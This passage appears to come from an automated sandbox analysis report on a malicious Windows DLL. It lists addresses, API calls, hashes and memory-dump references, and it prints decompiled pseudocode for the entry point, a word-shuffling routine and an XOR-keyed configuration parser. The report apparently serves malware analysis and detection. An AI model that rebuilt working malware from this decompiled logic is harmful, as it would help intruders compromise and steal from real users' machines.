                                                          0x04c05c09
                                                          0x04c05c0e
                                                          0x04c05c18
                                                          0x04c05c18
                                                          0x04c05c10
                                                          0x04c05c10
                                                          0x04c05c10
                                                          0x04c05c10
                                                          0x04c05c1f
                                                          0x04c05c2c
                                                          0x04c05c33
                                                          0x04c05c38
                                                          0x04c05c38
                                                          0x04c05c40
                                                          0x04c05c43
                                                          0x04c05c69
                                                          0x04c05c75
                                                          0x04c05c7a
                                                          0x04c05c7f
                                                          0x04c05c81
                                                          0x04c05cad
                                                          0x04c05caf
                                                          0x04c05c83
                                                          0x04c05c87
                                                          0x04c05c8c
                                                          0x04c05c91
                                                          0x04c05c98
                                                          0x04c05c9e
                                                          0x04c05ca3
                                                          0x04c05ca9
                                                          0x04c05cb0
                                                          0x04c05cb2
                                                          0x04c05cb4
                                                          0x04c05cc3
                                                          0x04c05cc9
                                                          0x04c05cce
                                                          0x04c05cd0
                                                          0x04c05d00
                                                          0x04c05d02
                                                          0x04c05cd2
                                                          0x04c05cd2
                                                          0x04c05cd8
                                                          0x04c05ce5
                                                          0x04c05ceb
                                                          0x04c05ceb
                                                          0x04c05cf3
                                                          0x04c05cfc
                                                          0x04c05d03
                                                          0x04c05d05
                                                          0x04c05d07
                                                          0x04c05d0e
                                                          0x04c05d1b
                                                          0x04c05d25
                                                          0x04c05d27
                                                          0x04c05d29
                                                          0x00000000
                                                          0x00000000
                                                          0x04c05d2b
                                                          0x04c05d30
                                                          0x04c05d32
                                                          0x04c05d39
                                                          0x04c05d3d
                                                          0x04c05d40
                                                          0x04c05d55
                                                          0x04c05d59
                                                          0x04c05d5e
                                                          0x00000000
                                                          0x04c05d5e
                                                          0x04c05d42
                                                          0x04c05d44
                                                          0x00000000
                                                          0x00000000
                                                          0x04c05d4f
                                                          0x04c05d51
                                                          0x04c05d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c05d53
                                                          0x04c05d36
                                                          0x04c05d36
                                                          0x04c05d07
                                                          0x04c05c45
                                                          0x04c05c45
                                                          0x04c05c4a
                                                          0x04c05d60
                                                          0x04c05d64
                                                          0x04c05d6c
                                                          0x04c05d6c
                                                          0x00000000
                                                          0x04c05d64
                                                          0x04c05c50
                                                          0x04c05c53
                                                          0x04c05c5d
                                                          0x04c05c64
                                                          0x00000000
                                                          0x04c05d74
                                                          0x04c05d74
                                                          0x04c05d78
                                                          0x04c05d7c
                                                          0x04c05d7c

                                                          APIs
                                                            • Part of subcall function 04C06C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04C05BBB,00000000,00000000), ref: 04C06C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04C05C38
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • memset.NTDLL ref: 04C05C87
                                                          • RtlInitializeCriticalSection.NTDLL(06889570), ref: 04C05C98
                                                            • Part of subcall function 04C01C66: memset.NTDLL ref: 04C01C7B
                                                            • Part of subcall function 04C01C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C01CBD
                                                            • Part of subcall function 04C01C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04C01CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04C05CC3
                                                          • wsprintfA.USER32 ref: 04C05CF3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: ec1aadc050d417f85d25865dd7854e1c410257473ded45536ad1158c1f427b7b
                                                          • Instruction ID: b3c77289a0170512dd00e9688a5ea03d58e282bd39a8d94a9d1b88d55a694f45
                                                          • Opcode Fuzzy Hash: ec1aadc050d417f85d25865dd7854e1c410257473ded45536ad1158c1f427b7b
                                                          • Instruction Fuzzy Hash: F651A375A00318BBEB21DBE4D94CB6E77BAEB08704F05C826E502D71C0E678BE859F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C062DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E04C062DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04C0A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04C0A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04C0A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4c0d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x04c062e1
                                                          0x04c062e8
                                                          0x04c062ed
                                                          0x04c062f0
                                                          0x04c062f7
                                                          0x04c062fa
                                                          0x04c062fd
                                                          0x04c06302
                                                          0x04c06307
                                                          0x04c0645b
                                                          0x04c0645d
                                                          0x04c0645f
                                                          0x04c06464
                                                          0x04c06464
                                                          0x04c0630d
                                                          0x04c06310
                                                          0x04c06313
                                                          0x04c06315
                                                          0x04c06315
                                                          0x04c06319
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0631d
                                                          0x04c06349
                                                          0x04c0634e
                                                          0x04c06350
                                                          0x04c06350
                                                          0x04c06353
                                                          0x04c06356
                                                          0x04c06356
                                                          0x04c06358
                                                          0x00000000
                                                          0x04c06323
                                                          0x04c06325
                                                          0x04c06344
                                                          0x04c06344
                                                          0x04c0635b
                                                          0x04c0635b
                                                          0x04c0635c
                                                          0x04c0635c
                                                          0x04c0635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0635f
                                                          0x04c06329
                                                          0x04c06370
                                                          0x04c06374
                                                          0x04c0644e
                                                          0x04c06450
                                                          0x04c06450
                                                          0x04c06451
                                                          0x04c06454
                                                          0x00000000
                                                          0x04c06454
                                                          0x04c0637d
                                                          0x04c0638e
                                                          0x04c06392
                                                          0x04c0644a
                                                          0x00000000
                                                          0x04c0644a
                                                          0x04c06398
                                                          0x04c0639b
                                                          0x04c0639f
                                                          0x04c063a3
                                                          0x04c063a8
                                                          0x04c06440
                                                          0x04c06440
                                                          0x00000000
                                                          0x04c06446
                                                          0x04c063b3
                                                          0x04c063bc
                                                          0x04c063d0
                                                          0x04c063d7
                                                          0x04c063ec
                                                          0x04c063f2
                                                          0x04c063fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c063fc
                                                          0x04c063fc
                                                          0x04c063fc
                                                          0x04c06403
                                                          0x04c0640b
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0640d
                                                          0x04c06416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c06418
                                                          0x04c0641a
                                                          0x04c0641d
                                                          0x04c0641d
                                                          0x04c06420
                                                          0x04c06424
                                                          0x04c06427
                                                          0x04c0642d
                                                          0x04c06430
                                                          0x04c06437
                                                          0x00000000
                                                          0x04c063b3
                                                          0x04c0632e
                                                          0x04c06336
                                                          0x04c0633c
                                                          0x04c0633e
                                                          0x04c0633e
                                                          0x04c06341
                                                          0x04c06343
                                                          0x00000000
                                                          0x04c06343
                                                          0x04c0631d
                                                          0x04c06363
                                                          0x04c06368
                                                          0x04c0636a
                                                          0x04c0636a
                                                          0x04c0636d
                                                          0x04c0636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04C063D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 04C063EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04C06403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04C06427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 4f52fed7de5bfcc24a7ace9fc3dd01abe09c6e541f001083c6f38d86f797a77b
                                                          • Instruction ID: efc196703fef8f21afbac77d6f9083ad732b392b21bc7c53005efaf77b163db2
                                                          • Opcode Fuzzy Hash: 4f52fed7de5bfcc24a7ace9fc3dd01abe09c6e541f001083c6f38d86f797a77b
                                                          • Instruction Fuzzy Hash: 68517A71B00218EBDB25CF99C4847ADBBB7EF45714F15C16AE8159B281C770BB62DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C04ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4c0d23c) == 0) {
						E04C01B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4c0d23c) == 1) {
						_t10 = E04C012E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x04c04ed1
                                                          0x04c04ed2
                                                          0x04c04ed5
                                                          0x04c04f07
                                                          0x04c04f09
                                                          0x04c04f09
                                                          0x04c04ed7
                                                          0x04c04ed8
                                                          0x04c04eed
                                                          0x04c04ef4
                                                          0x04c04ef6
                                                          0x04c04ef6
                                                          0x04c04ef4
                                                          0x04c04ed8
                                                          0x04c04f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(04C0D23C), ref: 04C04EDF
                                                            • Part of subcall function 04C012E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C012F8
                                                          • InterlockedDecrement.KERNEL32(04C0D23C), ref: 04C04EFF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 27fa1ec82eb01ab1a94440240ceb18d22621a8bfbe69d1500a3960acd4402a26
                                                          • Instruction ID: b22c83160bd82e0633e1c8a21c986f5a5873d426145c815f5aa1d3b45b334aba
                                                          • Opcode Fuzzy Hash: 27fa1ec82eb01ab1a94440240ceb18d22621a8bfbe69d1500a3960acd4402a26
                                                          • Instruction Fuzzy Hash: 9FE0863530813553B72D1EB49908B6BE643EF80B8AF05C924F682D10D0D610FD80E69D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C08D14, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E04C08D14(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04C0A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4c0d2a8; // 0x1c7a5a8
				_t4 = _t24 + 0x4c0edc0; // 0x6889368
				_t5 = _t24 + 0x4c0ed68; // 0x4f0053
				_t45 = E04C05356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x4c0d108(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4c0d2a8; // 0x1c7a5a8
						_t11 = _t32 + 0x4c0edb4; // 0x688935c
						_t48 = _t11;
						_t12 = _t32 + 0x4c0ed68; // 0x4f0053
						_t52 = E04C045C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4c0d2a8; // 0x1c7a5a8
							_t13 = _t35 + 0x4c0edfe; // 0x30314549
							if(E04C08E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x4c0d25c - 6;
								if( *0x4c0d25c <= 6) {
									_t42 =  *0x4c0d2a8; // 0x1c7a5a8
									_t15 = _t42 + 0x4c0ec0a; // 0x52384549
									E04C08E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4c0d2a8; // 0x1c7a5a8
							_t17 = _t38 + 0x4c0edf8; // 0x68893a0
							_t18 = _t38 + 0x4c0edd0; // 0x680043
							_t45 = E04C05D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4c0d238, 0, _t52);
						}
					}
					HeapFree( *0x4c0d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04C04F14(_t54);
				}
				return _t45;
			}

















                                                          0x04c08d14
                                                          0x04c08d24
                                                          0x04c08d27
                                                          0x04c08d2e
                                                          0x04c08d30
                                                          0x04c08d30
                                                          0x04c08d33
                                                          0x04c08d38
                                                          0x04c08d3f
                                                          0x04c08d51
                                                          0x04c08d55
                                                          0x04c08d63
                                                          0x04c08d71
                                                          0x04c08d75
                                                          0x04c08e06
                                                          0x04c08e06
                                                          0x04c08d7b
                                                          0x04c08d7b
                                                          0x04c08d80
                                                          0x04c08d80
                                                          0x04c08d87
                                                          0x04c08d93
                                                          0x04c08d95
                                                          0x04c08d97
                                                          0x04c08d99
                                                          0x04c08da0
                                                          0x04c08db2
                                                          0x04c08db4
                                                          0x04c08dbb
                                                          0x04c08dbd
                                                          0x04c08dc4
                                                          0x04c08dcf
                                                          0x04c08dcf
                                                          0x04c08dbb
                                                          0x04c08dd4
                                                          0x04c08dd9
                                                          0x04c08de0
                                                          0x04c08dfe
                                                          0x04c08e00
                                                          0x04c08e00
                                                          0x04c08d97
                                                          0x04c08e12
                                                          0x04c08e12
                                                          0x04c08e14
                                                          0x04c08e19
                                                          0x04c08e1b
                                                          0x04c08e1b
                                                          0x04c08e26

                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068893A0,?,00000000,30314549,00000014,004F0053,0688935C), ref: 04C08E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C0523E), ref: 04C08E12
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 719ee3e97c20f4868a8158786d6436c1c2606d125d58a0e1679aecaed549627f
                                                          • Instruction ID: 89468c188dd2ae21f4b280570b420843ab4cd81f897e4a5f8452d95713237ca6
                                                          • Opcode Fuzzy Hash: 719ee3e97c20f4868a8158786d6436c1c2606d125d58a0e1679aecaed549627f
                                                          • Instruction Fuzzy Hash: C331A239900219BFEB11EBD4DC44EAA7BBEEB44704F068565F611971A0D770EE84EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 04C0888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E04C0888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x4c0d2a4; // 0x63699bc3
				if(E04C07145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x4c0d2d8 = _v8;
				}
				_t31 =  *0x4c0d2a4; // 0x63699bc3
				if(E04C07145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x4c0d2a4; // 0x63699bc3
				if(E04C07145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x4c0d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x4c0d2a4; // 0x63699bc3
						_t43 = E04C06B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x4c0d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x4c0d2a4; // 0x63699bc3
						_t44 = E04C06B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x4c0d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x4c0d2a4; // 0x63699bc3
						_t45 = E04C06B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4c0d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x4c0d2a4; // 0x63699bc3
						_t46 = E04C06B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4c0d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x4c0d2a4; // 0x63699bc3
						_t47 = E04C06B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4c0d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x4c0d2a4; // 0x63699bc3
						_t48 = E04C06B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E04C056FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04C06702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x4c0d2a4; // 0x63699bc3
						_t49 = E04C06B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E04C056FA(0, _t49) != 0) {
						_t114 =  *0x4c0d32c; // 0x68895b0
						E04C023F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x4c0d2a4; // 0x63699bc3
						_t50 = E04C06B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x4c0d2a8; // 0x1c7a5a8
						_t20 = _t51 + 0x4c0e252; // 0x616d692f
						 *0x4c0d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E04C056FA(0, _t50);
						 *0x4c0d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x4c0d2a4; // 0x63699bc3
								_t53 = E04C06B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x4c0d2a8; // 0x1c7a5a8
								_t21 = _t54 + 0x4c0e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E04C056FA(0, _t53);
							}
							 *0x4c0d340 = _t55;
							HeapFree( *0x4c0d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x04c0888e
                                                          0x04c08891
                                                          0x04c088b1
                                                          0x04c088bf
                                                          0x04c088bf
                                                          0x04c088c4
                                                          0x04c088de
                                                          0x04c08b0d
                                                          0x04c08b14
                                                          0x04c08b1b
                                                          0x04c08b1b
                                                          0x04c088e4
                                                          0x04c08900
                                                          0x04c08afb
                                                          0x04c08b05
                                                          0x00000000
                                                          0x04c08906
                                                          0x04c08906
                                                          0x04c0890b
                                                          0x04c08921
                                                          0x04c0890d
                                                          0x04c0890d
                                                          0x04c0891a
                                                          0x04c0891a
                                                          0x04c0892b
                                                          0x04c0892d
                                                          0x04c08937
                                                          0x04c0893c
                                                          0x04c0893c
                                                          0x04c08937
                                                          0x04c08943
                                                          0x04c08959
                                                          0x04c08945
                                                          0x04c08945
                                                          0x04c08952
                                                          0x04c08952
                                                          0x04c0895d
                                                          0x04c0895f
                                                          0x04c08969
                                                          0x04c0896e
                                                          0x04c0896e
                                                          0x04c08969
                                                          0x04c08975
                                                          0x04c0898b
                                                          0x04c08977
                                                          0x04c08977
                                                          0x04c08984
                                                          0x04c08984
                                                          0x04c0898f
                                                          0x04c08991
                                                          0x04c0899b
                                                          0x04c089a0
                                                          0x04c089a0
                                                          0x04c0899b
                                                          0x04c089a7
                                                          0x04c089bd
                                                          0x04c089a9
                                                          0x04c089a9
                                                          0x04c089b6
                                                          0x04c089b6
                                                          0x04c089c1
                                                          0x04c089c3
                                                          0x04c089cd
                                                          0x04c089d2
                                                          0x04c089d2
                                                          0x04c089cd
                                                          0x04c089d9
                                                          0x04c089ef
                                                          0x04c089db
                                                          0x04c089db
                                                          0x04c089e8
                                                          0x04c089e8
                                                          0x04c089f3
                                                          0x04c089f5
                                                          0x04c089ff
                                                          0x04c08a04
                                                          0x04c08a04
                                                          0x04c089ff
                                                          0x04c08a0b
                                                          0x04c08a21
                                                          0x04c08a0d
                                                          0x04c08a0d
                                                          0x04c08a1a
                                                          0x04c08a1a
                                                          0x04c08a25
                                                          0x04c08a27
                                                          0x04c08a2a
                                                          0x04c08a2b
                                                          0x04c08a32
                                                          0x04c08a34
                                                          0x04c08a35
                                                          0x04c08a35
                                                          0x04c08a32
                                                          0x04c08a3c
                                                          0x04c08a52
                                                          0x04c08a3e
                                                          0x04c08a3e
                                                          0x04c08a4b
                                                          0x04c08a4b
                                                          0x04c08a56
                                                          0x04c08a64
                                                          0x04c08a6e
                                                          0x04c08a6e
                                                          0x04c08a75
                                                          0x04c08a8b
                                                          0x04c08a77
                                                          0x04c08a77
                                                          0x04c08a84
                                                          0x04c08a84
                                                          0x04c08a8f
                                                          0x04c08aa2
                                                          0x04c08aa2
                                                          0x04c08aa7
                                                          0x04c08aad
                                                          0x00000000
                                                          0x04c08a91
                                                          0x04c08a94
                                                          0x04c08a99
                                                          0x04c08aa0
                                                          0x04c08ab2
                                                          0x04c08ab4
                                                          0x04c08aca
                                                          0x04c08ab6
                                                          0x04c08ab6
                                                          0x04c08ac3
                                                          0x04c08ac3
                                                          0x04c08ace
                                                          0x04c08ada
                                                          0x04c08adf
                                                          0x04c08adf
                                                          0x04c08ad0
                                                          0x04c08ad3
                                                          0x04c08ad3
                                                          0x04c08aed
                                                          0x04c08af2
                                                          0x04c08af8
                                                          0x00000000
                                                          0x04c08af8
                                                          0x00000000
                                                          0x04c08aa0
                                                          0x04c08a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C08997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C089C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008), ref: 04C089FB
                                                          • HeapFree.KERNEL32(00000000,04C05D25,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008,?,04C05D25), ref: 04C08AF2
                                                          • HeapFree.KERNEL32(00000000,?,04C05D25,?,63699BC3,?,04C05D25,63699BC3,?,04C05D25,63699BC3,00000005,04C0D00C,00000008,?,04C05D25), ref: 04C08B05
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
